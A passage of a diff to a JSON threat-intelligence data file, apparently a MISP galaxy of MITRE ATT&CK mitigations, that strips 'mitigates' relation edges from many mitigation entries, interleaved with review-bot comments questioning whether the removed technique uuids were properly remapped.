"value": "Modify Registry Mitigation - T1112"
},
@@ -10193,15 +7978,7 @@
"https://technet.microsoft.com/en-us/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "943d370b-2054-44df-8be2-ab4139bde1c5",
"value": "Authentication Package Mitigation - T1131"
},
@@ -10218,15 +7995,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "51b37302-b844-4c08-ac98-ae6955ed1f55",
"value": "Screen Capture Mitigation - T1113"
},
@@ -10243,15 +8012,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "383caaa3-c46a-4f61-b2e3-653eb132f0e7",
"value": "Email Collection Mitigation - T1114"
},
@@ -10263,15 +8024,7 @@
"https://attack.mitre.org/mitigations/T1141"
]
},
- "related": [
- {
- "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8a61f6b9-6b7a-4cf2-8e08-f1e26434f6df",
"value": "Input Prompt Mitigation - T1141"
},
@@ -10288,15 +8041,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "19edfa02-1a5f-47e4-ad82-3288f57f64cf",
"value": "Clipboard Data Mitigation - T1115"
},
@@ -10308,15 +8053,7 @@
"https://attack.mitre.org/mitigations/T1161"
]
},
- "related": [
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "77fd4d73-6b79-4593-82e7-e4a439cc7604",
"value": "LC_LOAD_DYLIB Addition Mitigation - T1161"
},
@@ -10331,15 +8068,7 @@
"https://technet.microsoft.com/en-us/library/cc733026.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82fbc58b-171d-4a2d-9a20-c6b2a716bd08",
"value": "Code Signing Mitigation - T1116"
},
@@ -10356,15 +8085,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8bd1ae32-a686-48f4-a6f8-470287f76152",
"value": "Automated Collection Mitigation - T1119"
},
@@ -10378,15 +8099,7 @@
"https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6"
]
},
- "related": [
- {
- "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c7e49501-6021-414f-bfa1-94519d8ec314",
"value": "Template Injection Mitigation - T1221"
},
@@ -10403,15 +8116,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d",
"value": "Audio Capture Mitigation - T1123"
},
@@ -10424,15 +8129,7 @@
"https://attack.mitre.org/mitigations/T1132"
]
},
- "related": [
- {
- "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fcbe8424-eb3e-4794-b76d-e743f5a49b8b",
"value": "Data Encoding Mitigation - T1132"
},
@@ -10449,15 +8146,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d9f4b5fa-2a39-4bdf-b40a-ea998933cd6d",
"value": "Video Capture Mitigation - T1125"
},
@@ -10484,15 +8173,7 @@
"https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html"
]
},
- "related": [
- {
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "62ae52c9-7197-4f5b-be1d-10d2e1df2c96",
"value": "Domain Fronting Mitigation - T1172"
},
@@ -10507,15 +8188,7 @@
"https://attack.mitre.org/mitigations/T1182"
]
},
- "related": [
- {
- "dest-uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "95c29444-49f9-49f7-8b20-bcd68d8fcaa6",
"value": "AppCert DLLs Mitigation - T1182"
},
@@ -10527,15 +8200,7 @@
"https://attack.mitre.org/mitigations/T1192"
]
},
- "related": [
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ad7f983d-d5a8-4fce-a38c-b68eda61bf4e",
"value": "Spearphishing Link Mitigation - T1192"
},
@@ -10547,15 +8212,7 @@
"https://attack.mitre.org/mitigations/T1143"
]
},
- "related": [
- {
- "dest-uuid": "04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fae44eea-caa7-42b7-a2e2-0c815ba81b9a",
"value": "Hidden Window Mitigation - T1143"
},
@@ -10567,15 +8224,7 @@
"https://attack.mitre.org/mitigations/T1136"
]
},
- "related": [
- {
- "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9a5b7194-88e0-4579-b82f-e3c27b8cca80",
"value": "Create Account Mitigation - T1136"
},
@@ -10587,15 +8236,7 @@
"https://attack.mitre.org/mitigations/T1138"
]
},
- "related": [
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cfc2d2fc-14ff-495f-bd99-585be47b804f",
"value": "Application Shimming Mitigation - T1138"
},
@@ -10607,15 +8248,7 @@
"https://attack.mitre.org/mitigations/T1193"
]
},
- "related": [
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8f6b5ca6-263a-4ea9-98f3-afd2a3cd8119",
"value": "Spearphishing Attachment Mitigation - T1193"
},
@@ -10627,22 +8260,7 @@
"https://attack.mitre.org/mitigations/T1139"
]
},
- "related": [
- {
- "dest-uuid": "44dca04b-808d-46ca-b25f-d85236d4b9f8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ace4daee-f914-4707-be75-843f16da2edf",
"value": "Bash History Mitigation - T1139"
},
@@ -10654,15 +8272,7 @@
"https://attack.mitre.org/mitigations/T1144"
]
},
- "related": [
- {
- "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158",
"value": "Gatekeeper Bypass Mitigation - T1144"
},
@@ -10674,22 +8284,7 @@
"https://attack.mitre.org/mitigations/T1145"
]
},
- "related": [
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f27ef4f2-71fe-48b6-b7f4-02dcac14320e",
"value": "Private Keys Mitigation - T1145"
},
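Review bot: 56ff457d-5e39-492b-974c-dfd2b8603ffe is removed here from Private Keys Mitigation - T1145 and also from two general mitigation clusters in the hunks at -11701 and -13408, while 60b508a1-6a5e-46b1-821a-9f7b78752abf is removed only here. After the change no `mitigates` edge in this excerpt references either dest-uuid, so both techniques lose all mitigation coverage in this galaxy; worth confirming that both were revoked upstream rather than re-issued under new uuids that the regeneration failed to map.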
@@ -10701,15 +8296,7 @@
"https://attack.mitre.org/mitigations/T1147"
]
},
- "related": [
- {
- "dest-uuid": "ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "12cba7de-0a22-4a56-b51e-c514c67c3b43",
"value": "Hidden Users Mitigation - T1147"
},
@@ -10722,15 +8309,7 @@
"https://www.symantec.com/connect/articles/ssh-and-ssh-agent"
]
},
- "related": [
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "41cff8e9-fd05-408e-b3d5-d98c54c20bcf",
"value": "SSH Hijacking Mitigation - T1184"
},
@@ -10742,15 +8321,7 @@
"https://attack.mitre.org/mitigations/T1149"
]
},
- "related": [
- {
- "dest-uuid": "a0a189c8-d3bd-4991-bf6f-153d185ee373",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "6e7db820-9735-4545-bc64-039bc4ce354b",
"value": "LC_MAIN Hijacking Mitigation - T1149"
},
@@ -10762,15 +8333,7 @@
"https://attack.mitre.org/mitigations/T1165"
]
},
- "related": [
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94927849-03e3-4a07-8f4c-9ee21b626719",
"value": "Startup Items Mitigation - T1165"
},
@@ -10782,15 +8345,7 @@
"https://attack.mitre.org/mitigations/T1157"
]
},
- "related": [
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dc43c2fe-355e-4a79-9570-3267b0992784",
"value": "Dylib Hijacking Mitigation - T1157"
},
@@ -10802,15 +8357,7 @@
"https://attack.mitre.org/mitigations/T1159"
]
},
- "related": [
- {
- "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "121b2863-5b97-4538-acb3-f8aae070ec13",
"value": "Launch Agent Mitigation - T1159"
},
@@ -10823,15 +8370,7 @@
"https://attack.mitre.org/mitigations/T1176"
]
},
- "related": [
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b52f41b9-ccf6-4da7-a6c0-167eeb71fbd8",
"value": "Browser Extensions Mitigation - T1176"
},
@@ -10848,15 +8387,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "c1a452f3-6499-4c12-b7e9-a6a0a102af76",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "34d6a2ef-370e-4d21-a34b-6208b7c78f31",
"value": "Process Doppelgänging Mitigation - T1186"
},
@@ -10872,15 +8403,7 @@
"https://technet.microsoft.com/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a6e5ca3-562f-4185-a323-f3b62b5b2e6b",
"value": "LSASS Driver Mitigation - T1177"
},
@@ -10894,15 +8417,7 @@
"https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices"
]
},
- "related": [
- {
- "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7009ba4d-83d4-4851-9fbb-e09e28497765",
"value": "Forced Authentication Mitigation - T1187"
},
@@ -10917,15 +8432,7 @@
"https://www.symantec.com/connect/blogs/malware-update-windows-update"
]
},
- "related": [
- {
- "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cb825b86-3f3b-4686-ba99-44878f5d3173",
"value": "BITS Jobs Mitigation - T1197"
},
@@ -10937,15 +8444,7 @@
"https://attack.mitre.org/mitigations/T1199"
]
},
- "related": [
- {
- "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "797312d4-8a84-4daf-9c56-57da4133c322",
"value": "Trusted Relationship Mitigation - T1199"
},
@@ -10957,15 +8456,7 @@
"https://attack.mitre.org/mitigations/T1495"
]
},
- "related": [
- {
- "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "70886857-0f19-4caa-b081-548354a8a994",
"value": "Firmware Corruption Mitigation - T1495"
},
@@ -10982,15 +8473,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "46acc565-11aa-40ba-b629-33ba0ab9b07b",
"value": "Resource Hijacking Mitigation - T1496"
},
@@ -11008,29 +8491,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0b3ee33e-430b-476f-9525-72d120c90f8d",
"value": "Data Destruction Mitigation - T1488"
},
@@ -11042,15 +8503,7 @@
"https://attack.mitre.org/mitigations/T1489"
]
},
- "related": [
- {
- "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "417fed8c-bd76-48b5-90a2-a88882a95241",
"value": "Service Stop Mitigation - T1489"
},
@@ -11126,13 +8579,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3298ce88-1628-43b1-87d9-0b5336b193d7",
"tags": [
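Review bot: 327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61 is removed from this general mitigation cluster and again from the clusters in the hunks at -11659 and -12560, with no addition of that uuid anywhere in the diff. This is a different case from the per-technique clusters being emptied: a still-populated cluster loses one edge. If the technique was revoked upstream that is fine; if it was merged into another technique, the replacement edge should appear in one of these three hunks and does not, so the old-to-new technique uuid mapping used by the generator should be checked before merging.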
@@ -11147,13 +8593,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
"tags": [
@@ -11196,6 +8635,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -11369,15 +8815,7 @@
"https://attack.mitre.org/mitigations/T1163"
]
},
- "related": [
- {
- "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c3cf2312-3aab-4aaf-86e6-ab3505430482",
"value": "Rc.common Mitigation - T1163"
},
@@ -11390,20 +8828,6 @@
]
},
"related": [
- {
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
"tags": [
@@ -11444,15 +8868,7 @@
"https://attack.mitre.org/mitigations/T1121"
]
},
- "related": [
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a90da496-b460-47e8-92e7-cc36eb00bd9a",
"value": "Regsvcs/Regasm Mitigation - T1121"
},
@@ -11659,13 +9075,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
"tags": [
@@ -11680,13 +9089,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "52759bf1-fe12-4052-ace6-c5b0cf7dd7fd",
"tags": [
@@ -11701,13 +9103,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5",
"tags": [
@@ -11750,13 +9145,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c",
"tags": [
@@ -11771,13 +9159,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -11855,27 +9236,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c",
"tags": [
@@ -11911,13 +9271,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436",
"tags": [
@@ -11985,20 +9338,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
"tags": [
@@ -12340,13 +9679,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "22379609-a99f-4a01-bd7e-70f3e105859d",
"tags": [
@@ -12490,15 +9822,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "95ddb356-7ba0-4bd9-a889-247262b8946f",
"value": "Rootkit Mitigation - T1014"
},
@@ -12560,20 +9884,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
"tags": [
@@ -12623,13 +9933,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "791481f8-e96a-41be-b089-a088763083d4",
"tags": [
@@ -12637,13 +9940,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
"tags": [
@@ -12693,13 +9989,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
"tags": [
@@ -12721,20 +10010,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd",
"tags": [
@@ -12844,15 +10119,7 @@
"https://attack.mitre.org/mitigations/T1170"
]
},
- "related": [
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d2dce10b-3562-4d61-b2f5-7c6384b038e2",
"value": "Mshta Mitigation - T1170"
},
@@ -12914,13 +10181,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -12977,20 +10237,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530",
"tags": [
@@ -13033,13 +10279,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
"tags": [
@@ -13054,6 +10293,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d",
"tags": [
@@ -13082,13 +10328,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
@@ -13124,13 +10363,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
"tags": [
@@ -13200,15 +10432,7 @@
"https://technet.microsoft.com/library/cc938799.aspx"
]
},
- "related": [
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9da16278-c6c5-4410-8a6b-9c16ce8005b3",
"value": "Screensaver Mitigation - T1180"
},
@@ -13221,15 +10445,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET"
]
},
- "related": [
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
